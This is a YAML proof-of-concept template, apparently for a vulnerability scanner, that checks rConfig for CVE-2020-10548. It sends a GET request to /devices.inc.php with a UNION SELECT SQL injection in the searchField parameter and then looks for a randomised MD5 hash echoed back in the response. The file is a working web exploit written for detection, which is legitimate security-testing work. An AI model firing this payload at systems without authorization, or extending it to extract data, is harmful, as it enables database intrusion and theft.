name: poc-yaml-rconfig-cve-2020-10548
manual: true
transport: http
set:
    f1: randomLowercase(5)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /devices.inc.php?search=True&searchField=antani'+union+select+md5('{{f1}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(bytes(md5(f1)))
expression: r0()
detail:
    author: 2husky
    links:
        - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    vulnerability:
        id: CT-14326
        level: critical
